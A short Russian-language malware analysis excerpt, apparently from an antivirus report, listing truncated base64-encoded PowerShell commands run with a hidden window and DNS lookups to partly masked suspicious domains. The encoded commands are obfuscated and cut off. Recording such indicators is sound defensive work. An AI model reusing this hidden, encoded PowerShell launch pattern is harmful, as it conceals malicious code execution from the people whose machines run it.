Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADcANQAwADYAMABiAHgAMAAwADIAYgAwAD0AJwBjADEAMAAxADcAeABjADEAYgAwADcANwAnADsAJABjADAAMAA2ADAAYgA...
- DNS ASK ar#####turasolucao.com
- DNS ASK ko###diaper.com
- DNS ASK bl##.lasoy.net
- DNS ASK pr######man-cambodia.com
- DNS ASK ba####essence.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADcANQAwADYAMABiAHgAMAAwADIAYgAwAD0AJwBjADEAMAAxADcAeABjADEAYgAwADcANwAnADsAJABjADAAMAA2ADAAYgA...' (со скрытым окном)